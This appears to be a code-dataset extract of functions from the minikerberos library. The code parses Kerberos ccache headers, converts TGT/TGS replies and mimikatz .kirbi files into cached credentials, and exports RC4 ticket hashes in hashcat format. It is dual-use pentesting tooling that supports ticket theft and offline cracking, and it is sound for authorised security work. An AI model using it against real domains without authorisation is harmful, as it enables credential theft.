"key_name",
")",
":",
"pk_values",
"=",
"all_values_for",
"(",
"self",
",",
"key_name",
")",
"if",
"not",
"pk_values",
":",
"return",
"(",
"'absent'",
",",
"int",
")",
"# could still use it",
"key_type",
"=",
"type",
"(",
"th",
".",
"best_coercable",
"(",
"pk_values",
")",
")",
"num_unique_values",
"=",
"len",
"(",
"set",
"(",
"pk_values",
")",
")",
"if",
"num_unique_values",
"<",
"len",
"(",
"pk_values",
")",
":",
"return",
"(",
"False",
",",
"None",
")",
"# non-unique",
"if",
"num_unique_values",
"==",
"len",
"(",
"self",
")",
":",
"return",
"(",
"True",
",",
"key_type",
")",
"# perfect!",
"return",
"(",
"'partial'",
",",
"key_type",
")"
] | Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys | [
"Returns",
":",
"(",
"result",
"key_type",
")",
"result",
"is",
"True",
"False",
"or",
"absent",
"or",
"partial",
"(",
"both",
"still",
"usable",
")",
"key_type",
"is",
"int",
"for",
"integer",
"keys",
"or",
"str",
"for",
"hash",
"keys"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L220-L236 |
skelsec/minikerberos | minikerberos/ccache.py | Header.parse | def parse(data):
"""
returns a list of header tags
"""
reader = io.BytesIO(data)
headers = []
while reader.tell() < len(data):
h = Header()
h.tag = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.taglen = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.tagdata = reader.read(h.taglen)
headers.append(h)
return headers | python | def parse(data):
"""
returns a list of header tags
"""
reader = io.BytesIO(data)
headers = []
while reader.tell() < len(data):
h = Header()
h.tag = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.taglen = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.tagdata = reader.read(h.taglen)
headers.append(h)
return headers | [
"def",
"parse",
"(",
"data",
")",
":",
"reader",
"=",
"io",
".",
"BytesIO",
"(",
"data",
")",
"headers",
"=",
"[",
"]",
"while",
"reader",
".",
"tell",
"(",
")",
"<",
"len",
"(",
"data",
")",
":",
"h",
"=",
"Header",
"(",
")",
"h",
".",
"tag",
"=",
"int",
".",
"from_bytes",
"(",
"reader",
".",
"read",
"(",
"2",
")",
",",
"byteorder",
"=",
"'big'",
",",
"signed",
"=",
"False",
")",
"h",
".",
"taglen",
"=",
"int",
".",
"from_bytes",
"(",
"reader",
".",
"read",
"(",
"2",
")",
",",
"byteorder",
"=",
"'big'",
",",
"signed",
"=",
"False",
")",
"h",
".",
"tagdata",
"=",
"reader",
".",
"read",
"(",
"h",
".",
"taglen",
")",
"headers",
".",
"append",
"(",
"h",
")",
"return",
"headers"
] | returns a list of header tags | [
"returns",
"a",
"list",
"of",
"header",
"tags"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L29-L41 |
skelsec/minikerberos | minikerberos/ccache.py | Credential.to_tgt | def to_tgt(self):
"""
Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
"""
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t | python | def to_tgt(self):
"""
Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
"""
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t | [
"def",
"to_tgt",
"(",
"self",
")",
":",
"enc_part",
"=",
"EncryptedData",
"(",
"{",
"'etype'",
":",
"1",
",",
"'cipher'",
":",
"b''",
"}",
")",
"tgt_rep",
"=",
"{",
"}",
"tgt_rep",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"tgt_rep",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AS_REP",
".",
"value",
"tgt_rep",
"[",
"'crealm'",
"]",
"=",
"self",
".",
"server",
".",
"realm",
".",
"to_string",
"(",
")",
"tgt_rep",
"[",
"'cname'",
"]",
"=",
"self",
".",
"client",
".",
"to_asn1",
"(",
")",
"[",
"0",
"]",
"tgt_rep",
"[",
"'ticket'",
"]",
"=",
"Ticket",
".",
"load",
"(",
"self",
".",
"ticket",
".",
"to_asn1",
"(",
")",
")",
".",
"native",
"tgt_rep",
"[",
"'enc-part'",
"]",
"=",
"enc_part",
".",
"native",
"t",
"=",
"EncryptionKey",
"(",
"self",
".",
"key",
".",
"to_asn1",
"(",
")",
")",
".",
"native",
"return",
"tgt_rep",
",",
"t"
] | Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format | [
"Returns",
"the",
"native",
"format",
"of",
"an",
"AS_REP",
"message",
"and",
"the",
"sessionkey",
"in",
"EncryptionKey",
"native",
"format"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L102-L118 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgt | def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | python | def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | [
"def",
"add_tgt",
"(",
"self",
",",
"as_rep",
",",
"enc_as_rep_part",
",",
"override_pp",
"=",
"True",
")",
":",
"#from AS_REP",
"c",
"=",
"Credential",
"(",
")",
"c",
".",
"client",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"as_rep",
"[",
"'cname'",
"]",
",",
"as_rep",
"[",
"'crealm'",
"]",
")",
"if",
"override_pp",
"==",
"True",
":",
"self",
".",
"primary_principal",
"=",
"c",
".",
"client",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"enc_as_rep_part",
"[",
"'sname'",
"]",
",",
"enc_as_rep_part",
"[",
"'srealm'",
"]",
")",
"c",
".",
"time",
"=",
"Times",
".",
"from_asn1",
"(",
"enc_as_rep_part",
")",
"c",
".",
"key",
"=",
"Keyblock",
".",
"from_asn1",
"(",
"enc_as_rep_part",
"[",
"'key'",
"]",
")",
"c",
".",
"is_skey",
"=",
"0",
"#not sure!",
"c",
".",
"tktflags",
"=",
"TicketFlags",
"(",
"enc_as_rep_part",
"[",
"'flags'",
"]",
")",
".",
"cast",
"(",
"core",
".",
"IntegerBitString",
")",
".",
"native",
"c",
".",
"num_address",
"=",
"0",
"c",
".",
"num_authdata",
"=",
"0",
"c",
".",
"ticket",
"=",
"CCACHEOctetString",
".",
"from_asn1",
"(",
"Ticket",
"(",
"as_rep",
"[",
"'ticket'",
"]",
")",
".",
"dump",
"(",
")",
")",
"c",
".",
"second_ticket",
"=",
"CCACHEOctetString",
".",
"empty",
"(",
")",
"self",
".",
"credentials",
".",
"append",
"(",
"c",
")"
] | Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | [
"Creates",
"credential",
"object",
"from",
"the",
"TGT",
"and",
"adds",
"to",
"the",
"ccache",
"file",
"The",
"TGT",
"is",
"basically",
"the",
"native",
"representation",
"of",
"the",
"asn1",
"encoded",
"AS_REP",
"data",
"that",
"the",
"AD",
"sends",
"upon",
"a",
"succsessful",
"TGT",
"request",
".",
"This",
"function",
"doesn",
"t",
"do",
"decryption",
"of",
"the",
"encrypted",
"part",
"of",
"the",
"as_rep",
"object",
"it",
"is",
"expected",
"that",
"the",
"decrypted",
"XXX",
"is",
"supplied",
"in",
"enc_as_rep_part",
"override_pp",
":",
"bool",
"to",
"determine",
"if",
"client",
"principal",
"should",
"be",
"used",
"as",
"the",
"primary",
"principal",
"for",
"the",
"ccache",
"file"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L465-L489 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgs | def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | python | def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | [
"def",
"add_tgs",
"(",
"self",
",",
"tgs_rep",
",",
"enc_tgs_rep_part",
",",
"override_pp",
"=",
"False",
")",
":",
"#from AS_REP",
"c",
"=",
"Credential",
"(",
")",
"c",
".",
"client",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"tgs_rep",
"[",
"'cname'",
"]",
",",
"tgs_rep",
"[",
"'crealm'",
"]",
")",
"if",
"override_pp",
"==",
"True",
":",
"self",
".",
"primary_principal",
"=",
"c",
".",
"client",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"enc_tgs_rep_part",
"[",
"'sname'",
"]",
",",
"enc_tgs_rep_part",
"[",
"'srealm'",
"]",
")",
"c",
".",
"time",
"=",
"Times",
".",
"from_asn1",
"(",
"enc_tgs_rep_part",
")",
"c",
".",
"key",
"=",
"Keyblock",
".",
"from_asn1",
"(",
"enc_tgs_rep_part",
"[",
"'key'",
"]",
")",
"c",
".",
"is_skey",
"=",
"0",
"#not sure!",
"c",
".",
"tktflags",
"=",
"TicketFlags",
"(",
"enc_tgs_rep_part",
"[",
"'flags'",
"]",
")",
".",
"cast",
"(",
"core",
".",
"IntegerBitString",
")",
".",
"native",
"c",
".",
"num_address",
"=",
"0",
"c",
".",
"num_authdata",
"=",
"0",
"c",
".",
"ticket",
"=",
"CCACHEOctetString",
".",
"from_asn1",
"(",
"Ticket",
"(",
"tgs_rep",
"[",
"'ticket'",
"]",
")",
".",
"dump",
"(",
")",
")",
"c",
".",
"second_ticket",
"=",
"CCACHEOctetString",
".",
"empty",
"(",
")",
"self",
".",
"credentials",
".",
"append",
"(",
"c",
")"
] | Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | [
"Creates",
"credential",
"object",
"from",
"the",
"TGS",
"and",
"adds",
"to",
"the",
"ccache",
"file",
"The",
"TGS",
"is",
"the",
"native",
"representation",
"of",
"the",
"asn1",
"encoded",
"TGS_REP",
"data",
"when",
"the",
"user",
"requests",
"a",
"tgs",
"to",
"a",
"specific",
"service",
"principal",
"with",
"a",
"valid",
"TGT",
"This",
"function",
"doesn",
"t",
"do",
"decryption",
"of",
"the",
"encrypted",
"part",
"of",
"the",
"tgs_rep",
"object",
"it",
"is",
"expected",
"that",
"the",
"decrypted",
"XXX",
"is",
"supplied",
"in",
"enc_as_rep_part",
"override_pp",
":",
"bool",
"to",
"determine",
"if",
"client",
"principal",
"should",
"be",
"used",
"as",
"the",
"primary",
"principal",
"for",
"the",
"ccache",
"file"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L491-L515 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_kirbi | def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | python | def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | [
"def",
"add_kirbi",
"(",
"self",
",",
"krbcred",
",",
"override_pp",
"=",
"True",
",",
"include_expired",
"=",
"False",
")",
":",
"c",
"=",
"Credential",
"(",
")",
"enc_credinfo",
"=",
"EncKrbCredPart",
".",
"load",
"(",
"krbcred",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
")",
".",
"native",
"ticket_info",
"=",
"enc_credinfo",
"[",
"'ticket-info'",
"]",
"[",
"0",
"]",
"c",
".",
"client",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"ticket_info",
"[",
"'pname'",
"]",
",",
"ticket_info",
"[",
"'prealm'",
"]",
")",
"if",
"override_pp",
"==",
"True",
":",
"self",
".",
"primary_principal",
"=",
"c",
".",
"client",
"#yaaaaay 4 additional weirdness!!!!",
"#if sname name-string contains a realm as well htne impacket will crash miserably :(",
"if",
"len",
"(",
"ticket_info",
"[",
"'sname'",
"]",
"[",
"'name-string'",
"]",
")",
">",
"2",
"and",
"ticket_info",
"[",
"'sname'",
"]",
"[",
"'name-string'",
"]",
"[",
"-",
"1",
"]",
".",
"upper",
"(",
")",
"==",
"ticket_info",
"[",
"'srealm'",
"]",
".",
"upper",
"(",
")",
":",
"logging",
".",
"debug",
"(",
"'SNAME contains the realm as well, trimming it'",
")",
"t",
"=",
"ticket_info",
"[",
"'sname'",
"]",
"t",
"[",
"'name-string'",
"]",
"=",
"t",
"[",
"'name-string'",
"]",
"[",
":",
"-",
"1",
"]",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"t",
",",
"ticket_info",
"[",
"'srealm'",
"]",
")",
"else",
":",
"c",
".",
"server",
"=",
"CCACHEPrincipal",
".",
"from_asn1",
"(",
"ticket_info",
"[",
"'sname'",
"]",
",",
"ticket_info",
"[",
"'srealm'",
"]",
")",
"c",
".",
"time",
"=",
"Times",
".",
"from_asn1",
"(",
"ticket_info",
")",
"c",
".",
"key",
"=",
"Keyblock",
".",
"from_asn1",
"(",
"ticket_info",
"[",
"'key'",
"]",
")",
"c",
".",
"is_skey",
"=",
"0",
"#not sure!",
"c",
".",
"tktflags",
"=",
"TicketFlags",
"(",
"ticket_info",
"[",
"'flags'",
"]",
")",
".",
"cast",
"(",
"core",
".",
"IntegerBitString",
")",
".",
"native",
"c",
".",
"num_address",
"=",
"0",
"c",
".",
"num_authdata",
"=",
"0",
"c",
".",
"ticket",
"=",
"CCACHEOctetString",
".",
"from_asn1",
"(",
"Ticket",
"(",
"krbcred",
"[",
"'tickets'",
"]",
"[",
"0",
"]",
")",
".",
"dump",
"(",
")",
")",
"#kirbi only stores one ticket per file",
"c",
".",
"second_ticket",
"=",
"CCACHEOctetString",
".",
"empty",
"(",
")",
"self",
".",
"credentials",
".",
"append",
"(",
"c",
")"
] | if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return | [
"if",
"ticket_info",
"[",
"endtime",
"]",
"<",
"datetime",
".",
"datetime",
".",
"now",
"(",
"datetime",
".",
"timezone",
".",
"utc",
")",
":",
"if",
"include_expired",
"==",
"True",
":",
"logging",
".",
"debug",
"(",
"This",
"ticket",
"has",
"most",
"likely",
"expired",
"but",
"include_expired",
"is",
"forcing",
"me",
"to",
"add",
"it",
"to",
"cache!",
"This",
"can",
"cause",
"problems!",
")",
"else",
":",
"logging",
".",
"debug",
"(",
"This",
"ticket",
"has",
"most",
"likely",
"expired",
"skipping",
")",
"return"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L518-L557 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_all_tgt | def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts | python | def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts | [
"def",
"get_all_tgt",
"(",
"self",
")",
":",
"tgts",
"=",
"[",
"]",
"for",
"cred",
"in",
"self",
".",
"credentials",
":",
"if",
"cred",
".",
"server",
".",
"to_string",
"(",
")",
".",
"lower",
"(",
")",
".",
"find",
"(",
"'krbtgt'",
")",
"!=",
"-",
"1",
":",
"tgts",
".",
"append",
"(",
"cred",
".",
"to_tgt",
"(",
")",
")",
"return",
"tgts"
] | Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service | [
"Returns",
"a",
"list",
"of",
"AS_REP",
"tickets",
"in",
"native",
"format",
"(",
"dict",
")",
".",
"To",
"determine",
"which",
"ticket",
"are",
"AP_REP",
"we",
"check",
"for",
"the",
"server",
"principal",
"to",
"be",
"the",
"kerberos",
"service"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L566-L576 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_hashes | def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes | python | def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes | [
"def",
"get_hashes",
"(",
"self",
",",
"all_hashes",
"=",
"False",
")",
":",
"hashes",
"=",
"[",
"]",
"for",
"cred",
"in",
"self",
".",
"credentials",
":",
"res",
"=",
"Ticket",
".",
"load",
"(",
"cred",
".",
"ticket",
".",
"to_asn1",
"(",
")",
")",
".",
"native",
"if",
"int",
"(",
"res",
"[",
"'enc-part'",
"]",
"[",
"'etype'",
"]",
")",
"==",
"23",
"or",
"all_hashes",
"==",
"True",
":",
"hashes",
".",
"append",
"(",
"cred",
".",
"to_hash",
"(",
")",
")",
"return",
"hashes"
] | Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets | [
"Returns",
"a",
"list",
"of",
"hashes",
"in",
"hashcat",
"-",
"firendly",
"format",
"for",
"tickets",
"with",
"encryption",
"type",
"23",
"(",
"which",
"is",
"RC4",
")",
"all_hashes",
":",
"overrides",
"the",
"encryption",
"type",
"filtering",
"and",
"returns",
"hash",
"for",
"all",
"tickets"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L578-L590 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.from_kirbidir | def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc | python | def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc | [
"def",
"from_kirbidir",
"(",
"directory_path",
")",
":",
"cc",
"=",
"CCACHE",
"(",
")",
"dir_path",
"=",
"os",
".",
"path",
".",
"join",
"(",
"os",
".",
"path",
".",
"abspath",
"(",
"directory_path",
")",
",",
"'*.kirbi'",
")",
"for",
"filename",
"in",
"glob",
".",
"glob",
"(",
"dir_path",
")",
":",
"with",
"open",
"(",
"filename",
",",
"'rb'",
")",
"as",
"f",
":",
"kirbidata",
"=",
"f",
".",
"read",
"(",
")",
"kirbi",
"=",
"KRBCRED",
".",
"load",
"(",
"kirbidata",
")",
".",
"native",
"cc",
".",
"add_kirbi",
"(",
"kirbi",
")",
"return",
"cc"
] | Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object | [
"Iterates",
"trough",
"all",
".",
"kirbi",
"files",
"in",
"a",
"given",
"directory",
"and",
"converts",
"all",
"of",
"them",
"into",
"one",
"CCACHE",
"object"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L638-L650 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_kirbidir | def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump()) | python | def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump()) | [
"def",
"to_kirbidir",
"(",
"self",
",",
"directory_path",
")",
":",
"kf_abs",
"=",
"os",
".",
"path",
".",
"abspath",
"(",
"directory_path",
")",
"for",
"cred",
"in",
"self",
".",
"credentials",
":",
"kirbi",
",",
"filename",
"=",
"cred",
".",
"to_kirbi",
"(",
")",
"filename",
"=",
"'%s.kirbi'",
"%",
"filename",
".",
"replace",
"(",
"'..'",
",",
"'!'",
")",
"filepath",
"=",
"os",
".",
"path",
".",
"join",
"(",
"kf_abs",
",",
"filename",
")",
"with",
"open",
"(",
"filepath",
",",
"'wb'",
")",
"as",
"o",
":",
"o",
".",
"write",
"(",
"kirbi",
".",
"dump",
"(",
")",
")"
